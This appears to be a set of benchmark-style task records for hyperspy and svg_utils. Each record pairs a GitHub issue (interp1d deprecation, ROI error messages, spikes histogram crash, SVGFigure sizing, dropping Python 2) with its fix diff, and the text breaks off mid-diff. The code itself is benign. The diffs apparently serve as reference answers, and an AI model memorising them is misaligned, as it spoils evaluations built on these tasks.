diff --git a/hyperspy/signal_tools.py b/hyperspy/signal_tools.py
index 26165e7ecf..bb86f688ae 100644
--- a/hyperspy/signal_tools.py
+++ b/hyperspy/signal_tools.py
@@ -1747,7 +1747,7 @@ def __init__(self, signal, navigation_mask=None, signal_mask=None,
_logger.info(f'Threshold value: {threshold}')
self.argmax = None
self.derivmax = None
- self.kind = "linear"
+ self.spline_order = 1
self._temp_mask = np.zeros(self.signal().shape, dtype='bool')
self.index = 0
self.threshold = threshold
@@ -1826,10 +1826,7 @@ def get_interpolated_spectrum(self, axes_manager=None):
data = self.signal().copy()
axis = self.signal.axes_manager.signal_axes[0]
left, right = self.get_interpolation_range()
- if self.kind == 'linear':
- pad = 1
- else:
- pad = self.spline_order
+ pad = self.spline_order
ileft = left - pad
iright = right + pad
ileft = np.clip(ileft, 0, len(data))
@@ -1852,7 +1849,7 @@ def get_interpolated_spectrum(self, axes_manager=None):
# Interpolate
x = np.hstack((axis.axis[ileft:left], axis.axis[right:iright]))
y = np.hstack((data[ileft:left], data[right:iright]))
- intp = interpolate.interp1d(x, y, kind=self.kind)
+ intp = interpolate.make_interp_spline(x, y, k=self.spline_order)
data[left:right] = intp(axis.axis[left:right])
# Add noise
@@ -1882,17 +1879,11 @@ def remove_all_spikes(self):
@add_gui_method(toolkey="hyperspy.Signal1D.spikes_removal_tool")
class SpikesRemovalInteractive(SpikesRemoval, SpanSelectorInSignal1D):
- interpolator_kind = t.Enum(
- 'Linear',
- 'Spline',
- default='Linear',
- desc="the type of interpolation to use when\n"
- "replacing the signal where a spike has been replaced")
threshold = t.Float(400, desc="the derivative magnitude threshold above\n"
"which to find spikes")
click_to_show_instructions = t.Button()
show_derivative_histogram = t.Button()
- spline_order = t.Range(1, 10, 3,
+ spline_order = t.Range(1, 10, 1,
desc="the order of the spline used to\n"
"connect the reconstructed data")
interpolator = None
@@ -2013,19 +2004,13 @@ def on_disabling_span_selector(self):
self.interpolated_line = None
def _spline_order_changed(self, old, new):
- self.kind = self.spline_order
- self.span_selector_changed()
+ if new != old:
+ self.spline_order = new
+ self.span_selector_changed()
def _add_noise_changed(self, old, new):
self.span_selector_changed()
- def _interpolator_kind_changed(self, old, new):
- if new == 'linear':
- self.kind = new
- else:
- self.kind = self.spline_order
- self.span_selector_changed()
-
def create_interpolation_line(self):
self.interpolated_line = drawing.signal1d.Signal1DLine()
self.interpolated_line.data_function = self.get_interpolated_spectrum
diff --git a/upcoming_changes/3233.maintenance.rst b/upcoming_changes/3233.maintenance.rst
new file mode 100644
index 0000000000..fd522f2c87
--- /dev/null
+++ b/upcoming_changes/3233.maintenance.rst
@@ -0,0 +1,1 @@
+Replace deprecated :py:class:`scipy.interpolate.interp1d` with :py:func:`scipy.interpolate.make_interp_spline`
| scipy.interp1d legacy
`interp1d` is a legacy function in SciPy that will be deprecated in the future: https://docs.scipy.org/doc/scipy/tutorial/interpolate/1D.html#legacy-interface-for-1-d-interpolation-interp1d
It is currently used 6 times in the codebase: (3 in hs, 1 in rsciio, 2 in eels): https://github.com/search?q=repo%3Ahyperspy%2Fhyperspy%20interp1d&type=code
In view of the legacy nature, it would make sense to use the HyperSpy 2.0 release to actually replace all uses of `interp1d` as the kwargs might be slightly different and thus it is an api break.
In #3214 `scipy.interpolate.make_interp_spline` is used instead, which has similar behavior as `interp1d` and probably is suitable for most other occurences.
| 2023-09-25T17:06:11 | 0.0 | [] | [] |
|||
hyperspy/hyperspy | hyperspy__hyperspy-3222 | 24d9a39297624f18578da57e0dfdae783c85cc17 | diff --git a/hyperspy/drawing/widget.py b/hyperspy/drawing/widget.py
index d23643641e..d3e92e1ec8 100644
--- a/hyperspy/drawing/widget.py
+++ b/hyperspy/drawing/widget.py
@@ -323,7 +323,7 @@ class DraggableWidgetBase(WidgetBase):
def __init__(self, axes_manager, **kwargs):
super(DraggableWidgetBase, self).__init__(axes_manager, **kwargs)
- self.is_pointer=False
+ self.is_pointer = False
self.events.moved = Event(doc="""
Event that triggers when the widget was moved.
@@ -831,7 +831,7 @@ def _update_patch_geometry(self):
self.draw_patch()
-class ResizersMixin(object):
+class ResizersMixin:
"""
Widget mix-in for adding resizing manipulation handles.
@@ -901,7 +901,9 @@ def _set_resizers(self, value, ax):
r.set_animated(self.blit)
else:
for r in self._resizer_handles:
- r.remove()
+ # check that the matplotlib patch is present before removing it
+ if r in ax.get_children():
+ r.remove()
self._resizers_on = value
def _get_resizer_size(self):
@@ -977,7 +979,8 @@ def set_on(self, value):
super(ResizersMixin, self).set_on(value)
def onpick(self, event):
- """Picking of main patch is same as for widget base, but this also
+ """
+ Picking of main patch is same as for widget base, but this also
handles picking of the resize handles. If a resize handle is picked,
`picked` is set to `True`, and `resizer_picked` is set to an integer
indicating which handle was picked (0-3 for top left, top right, bottom
@@ -1009,7 +1012,7 @@ def _add_patch_to(self, ax):
"""Same as widget base, but also adds resizers if 'resizers' property
is True.
"""
- if self.resizers:
+ if self.resizers and self._resizers_on:
self._set_resizers(True, ax)
if hasattr(super(ResizersMixin, self), '_add_patch_to'):
super(ResizersMixin, self)._add_patch_to(ax)
diff --git a/upcoming_changes/3222.bugfix.rst b/upcoming_changes/3222.bugfix.rst
new file mode 100644
index 0000000000..10971c3d68
--- /dev/null
+++ b/upcoming_changes/3222.bugfix.rst
@@ -0,0 +1,1 @@
+Fix harmless error message when using multiple RectangleROI: check if resizer patches are drawn before removing them. Don't display resizers when adding the widget to the figure (widget in unselected state) for consistency with unselected state
| Error messages when using 2 RectangularROI.
#### Describe the bug
Error message shows up when using 2 RectangularROI. The 2 RectangularROI still work as intended tho.
#### To Reproduce
The error message shows up when:
- Change RectangularROI size.
- Move RectangularROI.
- Double clicks on RectangularROI.
```
# minimal example
%matplotlib qt
import numpy as np
import matplotlib.pyplot as plt
import hyperspy.api as hs
s = hs.signals.Signal1D(np.random.random((20, 20, 30)))
xx2, yy2, xx1, yy1 = 0, 0, 2, 2
shiftx = 5
shifty = 3
rect_roi0 = hs.roi.RectangularROI(xx2, yy2, xx1, yy1) # x1, y1, x2, y2
rect_roi1 = hs.roi.RectangularROI(xx2 + shiftx , yy2 + shifty, xx1 + shiftx, yy1 + shifty)
s.plot()
color = ["tab:blue", "tab:orange"]
roi0 = rect_roi0.interactive(s, color=color[0])
roi1 = rect_roi1.interactive(s, color=color[1])
```
#### Expected behavior
Error message not showing.
| 2023-09-01T19:54:01 | 0.0 | [] | [] |
|||
hyperspy/hyperspy | hyperspy__hyperspy-3005 | 2db65365c88da07d380e84bd20c42928ce61e207 | diff --git a/hyperspy/_signals/signal1d.py b/hyperspy/_signals/signal1d.py
index d838363640..4abbd13fd5 100644
--- a/hyperspy/_signals/signal1d.py
+++ b/hyperspy/_signals/signal1d.py
@@ -16,11 +16,11 @@
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <https://www.gnu.org/licenses/#GPL>.
-import os
import logging
import math
+import os
+import warnings
-import matplotlib.pyplot as plt
import numpy as np
import dask.array as da
from scipy import interpolate
@@ -29,7 +29,8 @@
from hyperspy.signal import BaseSignal
from hyperspy._signals.common_signal1d import CommonSignal1D
-from hyperspy.signal_tools import SpikesRemoval, SpikesRemovalInteractive
+from hyperspy.signal_tools import (
+ SpikesRemoval, SpikesRemovalInteractive, SimpleMessage)
from hyperspy.models.model1d import Model1D
from hyperspy.misc.lowess_smooth import lowess
from hyperspy.misc.utils import is_binned # remove in v2.0
@@ -270,9 +271,15 @@ def __init__(self, *args, **kwargs):
raise ValueError("Signal1D can't be ragged.")
super().__init__(*args, **kwargs)
- def _get_spikes_diagnosis_histogram_data(self, signal_mask=None,
- navigation_mask=None,
- **kwargs):
+ def _spikes_diagnosis(
+ self,
+ signal_mask=None,
+ navigation_mask=None,
+ show_plot=False,
+ use_gui=False,
+ **kwargs
+ ):
+
self._check_signal_dimension_equals_one()
dc = self.data
axis = self.axes_manager.signal_axes[0].axis
@@ -281,22 +288,41 @@ def _get_spikes_diagnosis_histogram_data(self, signal_mask=None,
axis = axis[~signal_mask]
if navigation_mask is not None:
dc = dc[~navigation_mask, :]
+ if dc.size == 0:
+ raise ValueError("The data size must be higher than 0.")
der = abs(np.gradient(dc, axis, axis=-1))
n = ((~navigation_mask).sum() if navigation_mask else
self.axes_manager.navigation_size)
# arbitrary cutoff for number of spectra necessary before histogram
# data is compressed by finding maxima of each spectrum
- tmp = BaseSignal(der) if n < 2000 else BaseSignal(
- np.ravel(der.max(-1)))
+ tmp = BaseSignal(der) if n < 2000 else BaseSignal(np.ravel(der.max(-1)))
+
+ s_ = tmp.get_histogram(**kwargs)
+ s_.axes_manager[0].name = "Derivative magnitude"
+ s_.metadata.Signal.quantity = "Counts"
+ s_.metadata.General.title = "Spikes Analysis"
+
+ if s_.data.size == 1:
+ message = "The derivative of the data is constant."
+ if use_gui:
+ m = SimpleMessage(text=message)
+ try:
+ m.gui()
+ except (NotImplementedError, ImportError):
+ # This is only available for traitsui, in case of ipywidgets
+ # we show a warning
+ warnings.warn(message)
+ else:
+ warnings.warn(message)
+ elif show_plot:
+ s_.plot(norm="log")
- # get histogram signal using smart binning and plot
- return tmp.get_histogram(**kwargs)
+ return s_
- def spikes_diagnosis(self, signal_mask=None,
- navigation_mask=None,
- **kwargs):
- """Plots a histogram to help in choosing the threshold for
+ def spikes_diagnosis(self, signal_mask=None, navigation_mask=None, **kwargs):
+ """
+ Plots a histogram to help in choosing the threshold for
spikes removal.
Parameters
@@ -312,27 +338,13 @@ def spikes_diagnosis(self, signal_mask=None,
spikes_removal_tool
"""
- tmph = self._get_spikes_diagnosis_histogram_data(signal_mask,
- navigation_mask,
- **kwargs)
- tmph.plot()
-
- # Customize plot appearance
- plt.gca().set_title('')
- plt.gca().fill_between(tmph.axes_manager[0].axis,
- tmph.data,
- facecolor='#fddbc7',
- interpolate=True,
- color='none')
- ax = tmph._plot.signal_plot.ax
- axl = tmph._plot.signal_plot.ax_lines[0]
- axl.set_line_properties(color='#b2182b')
- plt.xlabel('Derivative magnitude')
- plt.ylabel('Log(Counts)')
- ax.set_yscale('log')
- ax.set_ylim(10 ** -1, plt.ylim()[1])
- ax.set_xlim(plt.xlim()[0], 1.1 * plt.xlim()[1])
- plt.draw()
+ self._spikes_diagnosis(
+ signal_mask=signal_mask,
+ navigation_mask=navigation_mask,
+ show_plot=True,
+ use_gui=False,
+ **kwargs
+ )
spikes_diagnosis.__doc__ %= (SIGNAL_MASK_ARG, NAVIGATION_MASK_ARG)
diff --git a/hyperspy/signal_tools.py b/hyperspy/signal_tools.py
index 30b1b47145..c72e847854 100644
--- a/hyperspy/signal_tools.py
+++ b/hyperspy/signal_tools.py
@@ -1757,10 +1757,13 @@ def __init__(self, signal, navigation_mask=None, signal_mask=None,
signal.axes_manager.indices = self.coordinates[0]
if threshold == 'auto':
# Find the first zero of the spikes diagnosis plot
- hist = signal._get_spikes_diagnosis_histogram_data(
+ hist = signal._spikes_diagnosis(
signal_mask=signal_mask,
navigation_mask=navigation_mask,
- max_num_bins=max_num_bins)
+ max_num_bins=max_num_bins,
+ show_plot=False,
+ use_gui=False,
+ )
zero_index = np.where(hist.data == 0)[0]
if zero_index.shape[0] > 0:
index = zero_index[0]
@@ -1950,9 +1953,13 @@ def _click_to_show_instructions_fired(self):
title="Instructions"),
def _show_derivative_histogram_fired(self):
- self.signal.spikes_diagnosis(signal_mask=self.signal_mask,
- navigation_mask=self.navigation_mask,
- max_num_bins=self.max_num_bins)
+ self.signal._spikes_diagnosis(
+ signal_mask=self.signal_mask,
+ navigation_mask=self.navigation_mask,
+ max_num_bins=self.max_num_bins,
+ show_plot=True,
+ use_gui=True,
+ )
def _reset_line(self):
if self.interpolated_line is not None:
diff --git a/upcoming_changes/3005.bugfix.rst b/upcoming_changes/3005.bugfix.rst
new file mode 100644
index 0000000000..644d4b500a
--- /dev/null
+++ b/upcoming_changes/3005.bugfix.rst
@@ -0,0 +1,1 @@
+Fix handling constant derivative in :py:meth:`~._signals.signal1D.Signal1D.spikes_removal_tool`
\ No newline at end of file
| AttributeError on spikes_removal_tool() when using "show derivative histogram"
#### Describe the bug
"show derivative histogram" in the "spikes_removal_tool()" causes AttributeError for the EELSSpectrum and Signal1D objects created by "hs.signals.EELSSpectrum()" and "hs.signals.Signal1D()". But, it works well for the data loaded by "hs.load()".
#### To Reproduce
Steps to reproduce the behavior:
```
%matplotlib qt
import hyperspy.api as hs
```
This is the example in Signal1D Tools in the User guide.
```
s = hs.signals.Signal1D(np.arange(5*10*20).reshape((5, 10, 20)))
s.isig[8:17].spikes_removal_tool()
```
This causes AttributeError below. When executed, "Spikes removal tool" window pops up well. But, when "Show derivative histogram" button is clicked, the error happens. This always happens for any objects created by "hs.signals.EELSSpectrum()" and "hs.signals.Signal1D()".
```
AttributeError Traceback (most recent call last)
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy_gui_ipywidgets\tools.py:802, in spikes_removal_ipy.<locals>.on_show_diff_clicked(b)
801 def on_show_diff_clicked(b):
--> 802 obj._show_derivative_histogram_fired()
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy\signal_tools.py:1953, in SpikesRemovalInteractive._show_derivative_histogram_fired(self)
1952 def _show_derivative_histogram_fired(self):
-> 1953 self.signal.spikes_diagnosis(signal_mask=self.signal_mask,
1954 navigation_mask=self.navigation_mask,
1955 max_num_bins=self.max_num_bins)
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy\_signals\signal1d.py:327, in Signal1D.spikes_diagnosis(self, signal_mask, navigation_mask, **kwargs)
321 plt.gca().set_title('')
322 plt.gca().fill_between(tmph.axes_manager[0].axis,
323 tmph.data,
324 facecolor='#fddbc7',
325 interpolate=True,
326 color='none')
--> 327 ax = tmph._plot.signal_plot.ax
328 axl = tmph._plot.signal_plot.ax_lines[0]
329 axl.set_line_properties(color='#b2182b')
AttributeError: 'NoneType' object has no attribute 'signal_plot'
```
But, interestingly, this error does not happen for the real experimental data loaded by "hs.load()". "Show derivative histogram" works well.
```
s = hs.load('01_EELS_Ref_core loss_aligned.dm4')
s.spikes_removal_tool()
```
#### Expected behavior
It was expected that "Show derivative histogram" works well, and show me the histogram when clicking the button.
#### Python environement:
- HyperSpy version: 1.7.1
- Python version: 3.8.5
| 2022-08-31T18:40:47 | 0.0 | [] | [] |
|||
btel/svg_utils | btel__svg_utils-104 | 4abf7fb18cea0da04b6b2a0bcacbec5daded1662 | diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 15831e0..73321ce 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/psf/black
- rev: 20.8b1
+ rev: 22.8.0
hooks:
- id: black
language_version: python3
diff --git a/src/svgutils/common.py b/src/svgutils/common.py
new file mode 100644
index 0000000..9928d72
--- /dev/null
+++ b/src/svgutils/common.py
@@ -0,0 +1,59 @@
+import re
+
+
+class Unit:
+ """Implementation of SVG units and conversions between them.
+
+ Parameters
+ ----------
+ measure : str
+ value with unit (for example, '2cm')
+ """
+
+ per_inch = {"px": 90, "cm": 2.54, "mm": 25.4, "pt": 72.0}
+
+ def __init__(self, measure):
+ try:
+ self.value = float(measure)
+ self.unit = "px"
+ except ValueError:
+ m = re.match("([0-9]+\.?[0-9]*)([a-z]+)", measure)
+ value, unit = m.groups()
+ self.value = float(value)
+ self.unit = unit
+
+ def to(self, unit):
+ """Convert to a given unit.
+
+ Parameters
+ ----------
+ unit : str
+ Name of the unit to convert to.
+
+ Returns
+ -------
+ u : Unit
+ new Unit object with the requested unit and computed value.
+ """
+ u = Unit("0cm")
+ u.value = self.value / self.per_inch[self.unit] * self.per_inch[unit]
+ u.unit = unit
+ return u
+
+ def __str__(self):
+ return "{}{}".format(self.value, self.unit)
+
+ def __repr__(self):
+ return "Unit({})".format(str(self))
+
+ def __mul__(self, number):
+ u = Unit("0cm")
+ u.value = self.value * number
+ u.unit = self.unit
+ return u
+
+ def __truediv__(self, number):
+ return self * (1.0 / number)
+
+ def __div__(self, number):
+ return self * (1.0 / number)
diff --git a/src/svgutils/compose.py b/src/svgutils/compose.py
index 8a30a3b..0932fe5 100644
--- a/src/svgutils/compose.py
+++ b/src/svgutils/compose.py
@@ -15,9 +15,9 @@
"""
import os
-import re
from svgutils import transform as _transform
+from svgutils.common import Unit
CONFIG = {
"svg.file_path": ".",
@@ -358,61 +358,3 @@ def tile(self, ncols, nrows):
if iy > nrows:
break
return self
-
-
-class Unit:
- """Implementation of SVG units and conversions between them.
-
- Parameters
- ----------
- measure : str
- value with unit (for example, '2cm')
- """
-
- per_inch = {"px": 90, "cm": 2.54, "mm": 25.4, "pt": 72.0}
-
- def __init__(self, measure):
- try:
- self.value = float(measure)
- self.unit = "px"
- except ValueError:
- m = re.match("([0-9]+\.?[0-9]*)([a-z]+)", measure)
- value, unit = m.groups()
- self.value = float(value)
- self.unit = unit
-
- def to(self, unit):
- """Convert to a given unit.
-
- Parameters
- ----------
- unit : str
- Name of the unit to convert to.
-
- Returns
- -------
- u : Unit
- new Unit object with the requested unit and computed value.
- """
- u = Unit("0cm")
- u.value = self.value / self.per_inch[self.unit] * self.per_inch[unit]
- u.unit = unit
- return u
-
- def __str__(self):
- return "{}{}".format(self.value, self.unit)
-
- def __repr__(self):
- return "Unit({})".format(str(self))
-
- def __mul__(self, number):
- u = Unit("0cm")
- u.value = self.value * number
- u.unit = self.unit
- return u
-
- def __truediv__(self, number):
- return self * (1.0 / number)
-
- def __div__(self, number):
- return self * (1.0 / number)
diff --git a/src/svgutils/transform.py b/src/svgutils/transform.py
index ef15f9e..5cddfa3 100644
--- a/src/svgutils/transform.py
+++ b/src/svgutils/transform.py
@@ -7,6 +7,8 @@
except ImportError:
from io import StringIO
+from svgutils.common import Unit
+
SVG_NAMESPACE = "http://www.w3.org/2000/svg"
XLINK_NAMESPACE = "http://www.w3.org/1999/xlink"
SVG = "{%s}" % SVG_NAMESPACE
@@ -239,17 +241,10 @@ def __init__(self, width=None, height=None):
self._height = 0
if width:
- try:
- self.width = width # this goes to @width.setter a few lines down
- except AttributeError:
- # int or str
- self._width = width
+ self.width = width # this goes to @width.setter a few lines down
if height:
- try:
- self.height = height # this goes to @height.setter a few lines down
- except AttributeError:
- self._height = height
+ self.height = height # this goes to @height.setter a few lines down
@property
def width(self):
@@ -258,6 +253,8 @@ def width(self):
@width.setter
def width(self, value):
+ if not isinstance(value, Unit):
+ value = Unit(value)
self._width = value.value
self.root.set("width", str(value))
self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
@@ -269,6 +266,8 @@ def height(self):
@height.setter
def height(self, value):
+ if not isinstance(value, Unit):
+ value = Unit(value)
self._height = value.value
self.root.set("height", str(value))
self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
| SVGFigure does not set width and height element if created directly
Width and height aren't correctly set in the XML if `transform.SVGFigure` is created directly:
```python
import svgutils
svgutils.transform.SVGFigure("10cm", "16cm").to_str()
```
prints
```python
b'<?xml version=\'1.0\' encoding=\'ASCII\' standalone=\'yes\'?>\n<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"/>\n'
```
This code is used in the tutorial:
https://github.com/btel/svg_utils/blob/4abf7fb18cea0da04b6b2a0bcacbec5daded1662/docs/source/tutorials/scripts/fig_final.py#L5
Therefore I expect that this is not an intended behavior.
| Hi @akhmerov, which version (or Git commit) of svgutils is this about?
I observed this both on 0.3.4 and master (4abf7fb)
same here but it works when i take one of the formats from the tests
```python
import svgutils.transform as sg
from svgutils.compose import Unit
ovWdth = Unit('1080px')
ovHght = Unit('768px')
fig = sg.SVGFigure(ovWdth,ovHght)
```
I think the problem is here:
transform.py line:259,271
**value.value**
It works when the value use Unit(),but not work when use int or string
@width.setter
def width(self, value):
self._width = **value.value**
self.root.set("width", str(value))
self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
indeed we don't set the SVG tag attributes when width or height is an integer/string | 2022-09-27T20:43:50 | 0.0 | [] | [] |
||
btel/svg_utils | btel__svg_utils-67 | 0408398b72aaf5df82c483a1ce5b74d5d1cd6854 | diff --git a/.github/workflows/black.yml b/.github/workflows/black.yml
index 7a9bd04..2cf8799 100644
--- a/.github/workflows/black.yml
+++ b/.github/workflows/black.yml
@@ -9,3 +9,5 @@ jobs:
- uses: actions/[email protected]
- uses: actions/[email protected]
- uses: psf/[email protected]
+ env:
+ INPUT_BLACK_ARGS: --target-version py36
diff --git a/.github/workflows/python-publish.yml b/.github/workflows/python-publish.yml
index e38c6a2..9e20097 100644
--- a/.github/workflows/python-publish.yml
+++ b/.github/workflows/python-publish.yml
@@ -20,12 +20,12 @@ jobs:
python-version: '3.x'
- name: Install dependencies
run: |
- python -m pip install --upgrade pip
- pip install setuptools wheel twine
+ python3 -m pip install --upgrade pip
+ pip3 install setuptools wheel twine
- name: Build and publish
env:
TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
run: |
- python setup.py sdist bdist_wheel
+ python3 setup.py sdist bdist_wheel
twine upload dist/*
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index ad879de..5867440 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -3,4 +3,5 @@ repos:
rev: 20.8b1
hooks:
- id: black
- language_version: python3
+ language_version: python3
+ args: ['--target-version', 'py36']
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index a31a0f4..3cfe5c5 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -18,7 +18,7 @@ This project uses [black](https://github.com/psf/black) for automatically format
You can run the check and formatting hooks using pre-commit:
```
-pip install pre-commit
+pip3 install pre-commit
pre-commit run --all
```
diff --git a/README.rst b/README.rst
index 4c8b391..d80b6a6 100644
--- a/README.rst
+++ b/README.rst
@@ -23,11 +23,11 @@ Install
From PyPI
`````````
-You can install `svgutils` from Python Package Index (PyPI) using the `pip` utility::
+You can install `svgutils` from Python Package Index (PyPI) using the `pip3` utility::
- pip install svgutils --user
+ pip3 install svgutils --user
-Note that the `pip` will attempt to install `lxml` library if it is not already installed.
+Note that the `pip3` will attempt to install `lxml` library if it is not already installed.
For the installation to be sucessful, you need development libraries of `libxml2` and `libxslt1`.
On Ubuntu and other Debian-derived Linux distributions you can install them via::
@@ -52,12 +52,12 @@ From sources
To install system-wide (needs administrator privilages)::
- python setup.py install
+ python3 setup.py install
To install locally (do not forget to add
-``$HOME/python/lib/python2.6/site-packages/`` to your Python path)::
+``$HOME/python/lib/python3.6/site-packages/`` to your Python path)::
- python setup.py install --user
+ python3 setup.py install --user
License
-------
diff --git a/docs/source/getting_started.rst b/docs/source/getting_started.rst
index 505e415..099ac9d 100644
--- a/docs/source/getting_started.rst
+++ b/docs/source/getting_started.rst
@@ -10,11 +10,11 @@ Install
From PyPI
`````````
-You can install `svgutils` from Python Package Index (PyPI) using the `pip` utility::
+You can install `svgutils` from Python Package Index (PyPI) using the `pip3` utility::
- pip install svgutils --user
+ pip3 install svgutils --user
-Note that the `pip` will attempt to install `lxml` library if it is not already installed.
+Note that the `pip3` will attempt to install `lxml` library if it is not already installed.
For the installation to be sucessful, you need development libraries of `libxml2` and `libxslt1`.
On Ubuntu and other Debian-derived Linux distributions you can install them via::
@@ -39,9 +39,9 @@ From sources
To install system-wide (needs administrator privilages)::
- python setup.py install
+ python3 setup.py install
To install locally (do not forget to add
-``$HOME/python/lib/python2.6/site-packages/`` to your Python path)::
+``$HOME/python/lib/python3.6/site-packages/`` to your Python path)::
- python setup.py install --user
+ python3 setup.py install --user
diff --git a/docs/source/tutorials/figures/Makefile b/docs/source/tutorials/figures/Makefile
index 108af65..655eaad 100644
--- a/docs/source/tutorials/figures/Makefile
+++ b/docs/source/tutorials/figures/Makefile
@@ -1,5 +1,5 @@
all:
- python ../scripts/anscombe.py
- python ../scripts/sigmoid_fit.py
- python ../scripts/fig_final.py
- python ../scripts/fig_compose.py
+ python3 ../scripts/anscombe.py
+ python3 ../scripts/sigmoid_fit.py
+ python3 ../scripts/fig_final.py
+ python3 ../scripts/fig_compose.py
diff --git a/docs/source/tutorials/scripts/anscombe.py b/docs/source/tutorials/scripts/anscombe.py
index 1d87871..ba9aca0 100644
--- a/docs/source/tutorials/scripts/anscombe.py
+++ b/docs/source/tutorials/scripts/anscombe.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
"""
Edward Tufte uses this example from Anscombe to show 4 datasets of x
diff --git a/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py b/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
index 1afe056..d4fc1a0 100644
--- a/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
+++ b/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/docs/source/tutorials/scripts/fig_compose.py b/docs/source/tutorials/scripts/fig_compose.py
index 2a711ff..cbb3705 100644
--- a/docs/source/tutorials/scripts/fig_compose.py
+++ b/docs/source/tutorials/scripts/fig_compose.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/examples/compose_example.py b/examples/compose_example.py
index 7cd22e3..de4c80e 100644
--- a/examples/compose_example.py
+++ b/examples/compose_example.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/examples/stack_plots.py b/examples/stack_plots.py
index 8b0552c..5f73e7b 100644
--- a/examples/stack_plots.py
+++ b/examples/stack_plots.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
import numpy as np
diff --git a/examples/stack_svg.py b/examples/stack_svg.py
index af97f63..09dcaba 100644
--- a/examples/stack_svg.py
+++ b/examples/stack_svg.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.transform import fromfile
diff --git a/setup.py b/setup.py
index 3e31e66..d2c2f5a 100644
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from setuptools import setup
@@ -24,19 +24,18 @@
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
+ "Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.6",
- "Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 2.7",
- "Programming Language :: Python :: 2",
"Topic :: Multimedia :: Graphics :: Editors :: Vector-Based",
"Topic :: Scientific/Engineering :: Visualization",
"Topic :: Text Processing :: Markup",
],
package_dir={"": "src"},
+ python_requires=">=3.6",
install_requires=["lxml"],
download_url="https://github.com/btel/svg_utils/archive/v{}.tar.gz".format(
version_str
diff --git a/src/svgutils/compose.py b/src/svgutils/compose.py
index 5aa6486..8a30a3b 100644
--- a/src/svgutils/compose.py
+++ b/src/svgutils/compose.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
"""SVG definitions designed for easy SVG composing
diff --git a/src/svgutils/templates.py b/src/svgutils/templates.py
index d34a51c..e20c08d 100644
--- a/src/svgutils/templates.py
+++ b/src/svgutils/templates.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.transform import SVGFigure, GroupElement
| Plans for dropping support for end-of-life Python 2.7 and 3.5?
Hi!
The oldest version of Python that has *not* [reached end of life](https://endoflife.date/python) as of today is Python 3.6. The svgutils code base currently supports 2.7 and 3.5 officially and in practice. I have seen people have vastly different opinions on which versions of Python should be supported by a project in 2021, before. So I would just like to hear what the current plan or approach about end-of-life Python is, and then see how and if I can help.
A benefit of dropping support for old versions, is that we could e.g. start using [f-strings](https://www.python.org/dev/peps/pep-0498/) and [type hints](https://docs.python.org/3/library/typing.html) in this code base if we wanted, in general.
Best, Sebastian
Plans for dropping support for end-of-life Python 2.7 and 3.5?
Hi!
The oldest version of Python that has *not* [reached end of life](https://endoflife.date/python) as of today is Python 3.6. The svgutils code base currently supports 2.7 and 3.5 officially and in practice. I have seen people have vastly different opinions on which versions of Python should be supported by a project in 2021, before. So I would just like to hear what the current plan or approach about end-of-life Python is, and then see how and if I can help.
A benefit of dropping support for old versions, is that we could e.g. start using [f-strings](https://www.python.org/dev/peps/pep-0498/) and [type hints](https://docs.python.org/3/library/typing.html) in this code base if we wanted, in general.
Best, Sebastian
| sure, I am fine with dropping Python 2.x or even <=3.5 in 0.4.0. Especially if some features of >3.5 will be useful in the code base.
Okay, I'll prepare a pull request in a minute.
sure, I am fine with dropping Python 2.x or even <=3.5 in 0.4.0. Especially if some features of >3.5 will be useful in the code base.
Okay, I'll prepare a pull request in a minute. | 2021-02-11T14:04:14 | 0.0 | [] | [] |
||
btel/svg_utils | btel__svg_utils-58 | 3a9a550c76a342c81742552a79c140b67af7e286 | diff --git a/src/svgutils/transform.py b/src/svgutils/transform.py
index 39d129d..384379e 100644
--- a/src/svgutils/transform.py
+++ b/src/svgutils/transform.py
@@ -239,11 +239,17 @@ def __init__(self, width=None, height=None):
self._height = 0
if width:
- self._width = width.value
- self.width = width
+ try:
+ # width is an instance of Unit
+ self._width = width.value
+ except AttributeError:
+ # int or str
+ self._width = width
if height:
- self._height = height.value
